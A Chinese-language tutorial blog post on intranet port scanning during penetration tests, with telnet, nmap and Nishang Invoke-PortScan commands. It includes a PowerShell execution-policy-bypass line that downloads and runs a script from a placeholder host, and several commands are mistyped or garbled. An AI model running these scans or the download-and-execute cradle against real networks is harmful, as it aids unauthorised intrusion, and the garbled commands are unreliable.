内网安全-信息收集-内网资源探测-内网端口扫描

内网端口扫描

简介

端口是一切网络入侵的入口。通过对内网主机进行端口扫描,测试人员可以确定目标主机上开放的服务类型、服务版本,并查找相应的漏洞进行攻击。测试人员可以根据目标主机的情况,上传工具进行扫描,也可以借助内网代理或路由转发对目标主机发起扫描。

1利用Telnet 探测端口

   Telnet是进行远程登录的标准协议和主要方式,为用户提供了在本地计算机上完成远程主机工作的能力。telnet命令可以简单测试指定的端口号是正常打开还是关闭状态。
   telnet <IP> <Port>

2利用 Nmap进行端口扫描

Nmap是一个十分强大的端口扫描工具,在实际利用中可以借助内网代理对内网主机进行端口扫描。关于 Nmap的使用,更多使用方法请参考Nmap官方手册。下面仅给出几个常用的扫描命令。

执行以下命令,扫描目标主机的指定端口
nmap -p 80,88,135,139,443,8080,3306,3389 192.168.204.147

执行以下命令,扫描目标主机开放的全部端口
nmap -sS -p 1-6553510.10.10.11

执行以下命令,扫描并获取目标主机指定端口上开放的服务版本
nmap -sV -p 80,88,135,139,443,8080,3306,3389 10.10.10.11

3利用PowerShell进行端口扫描

NiShang是基于PowerShell 的渗透测试专用框架,集成了各种脚本和 Payload,广泛用于渗透测试的各阶段。

NiShang的 Scan模块中也有一个Invoke-PortsCan.ps1脚本,可以用来对主机进行端口扫描(具体见 Github 上的相关网页)。

执行以下命令,对内网的一个主机范围执行默认的端口扫描:
Invoke-PortScan -StartAddress 192.168.204.1 —EndAddress 192.168.204.254 -ResolveHost -ScanPort

执行以下命令,对内网中的一个主机范围扫描指定的端口
powershell.exe -exec bypass -Command “IEX(New-0bject Net.WebClient). DownloadString(‘http://your-ip:;port/Invoke-portscan.ps1’);Invoke-PortScan -StartAddress 192.168.204.1 EndAddress-192.168.204.254-ResolveHost -ScanPort -Port 80, 88, 135, 139,443,8080,3306,3389”

猜你喜欢

转载自blog.csdn.net/qq_45707966/article/details/133607311